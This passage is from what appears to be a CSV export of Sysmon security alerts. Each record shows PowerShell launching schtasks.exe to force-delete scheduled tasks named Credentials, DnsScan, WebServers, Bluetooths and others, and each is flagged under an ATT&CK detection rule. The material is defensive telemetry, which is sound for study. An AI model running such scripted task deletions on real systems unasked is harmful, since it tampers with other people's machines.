Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.353",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.067 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-00105fbd1e00} +ProcessId: 6308 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.070137800Z"",""eventRecordID"":""2520"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.067\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-00105fbd1e00}\r\nProcessId: 6308\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.067"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-00105fbd1e00}"",""processId"":""6308"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.322",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.040 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010d1bb1e00} +ProcessId: 3960 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.043630700Z"",""eventRecordID"":""2519"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.040\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010d1bb1e00}\r\nProcessId: 3960\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.040"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-0010d1bb1e00}"",""processId"":""3960"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.289",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.018 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-001028ba1e00} +ProcessId: 2328 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.020412600Z"",""eventRecordID"":""2518"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.018\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-001028ba1e00}\r\nProcessId: 2328\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.018"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-001028ba1e00}"",""processId"":""2328"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.244",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.984 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00103cb81e00} +ProcessId: 2344 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.989863500Z"",""eventRecordID"":""2517"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.984\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00103cb81e00}\r\nProcessId: 2344\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.984"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00103cb81e00}"",""processId"":""2344"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.239",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.944 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105cb61e00} +ProcessId: 1720 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.946193900Z"",""eventRecordID"":""2516"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.944\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105cb61e00}\r\nProcessId: 1720\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.944"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00105cb61e00}"",""processId"":""1720"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.212",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.913 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010b7b41e00} +ProcessId: 2356 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.920287800Z"",""eventRecordID"":""2515"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.913\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010b7b41e00}\r\nProcessId: 2356\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.913"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010b7b41e00}"",""processId"":""2356"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 